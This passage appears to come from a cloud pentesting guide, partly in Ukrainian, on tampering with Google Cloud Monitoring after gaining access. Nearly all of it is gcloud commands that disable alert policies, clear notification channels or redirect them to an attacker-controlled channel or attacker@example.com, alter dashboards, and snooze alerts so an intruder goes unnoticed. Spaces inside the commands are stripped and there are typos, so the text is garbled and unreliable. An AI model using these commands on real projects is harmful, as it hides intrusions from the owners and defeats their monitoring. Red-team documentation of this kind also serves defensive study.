# Disable policygcloudalphamonitoringpoliciesupdate<alert-policy>--no-enabled# Remove all notification channelsgcloudalphamonitoringpoliciesupdate<alert-policy>--clear-notification-channels# Chnage notification channelsgcloudalphamonitoringpoliciesupdate<alert-policy>--set-notification-channels=ATTACKER_CONTROLLED_CHANNEL# Modify alert conditionsgcloudalphamonitoringpoliciesupdate<alert-policy>--policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"# or use --policy-from-file <policy-file>
monitoring.dashboards.update
Змініть інформаційну панель, щоб порушити її:
# Disrupt dashboardgcloudmonitoringdashboardsupdate<dashboard>--config='''displayName: New Dashboard with New Display Nameetag: 40d1040034db4e5a9dee931ec1b12c0dgridLayout:widgets:- text:content: Hello World'''
# Stop alerts by creating a snoozergcloudmonitoringsnoozescreate--display-name="Maintenance Week" \--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \--start-time="2023-03-01T03:00:00.0-0500" \--end-time="2023-03-07T23:59:59.5-0500"
monitoring.snoozes.update
Оновіть час сну, щоб запобігти створенню сповіщень, коли зловмисник зацікавлений:
# Modify the timing of a snoozegcloudmonitoringsnoozesupdate<snooze>--start-time=START_TIME--end-time=END_TIME# odify everything, including affected policiesgcloudmonitoringsnoozesupdate<snooze>--snooze-from-file=<file>
# Delete or update labels, for example email channels have the email indicated heregcloudalphamonitoringchannelsupdateCHANNEL_ID--clear-channel-labelsgcloudalphamonitoringchannelsupdateCHANNEL_ID--update-channel-labels=email_address=attacker@example.com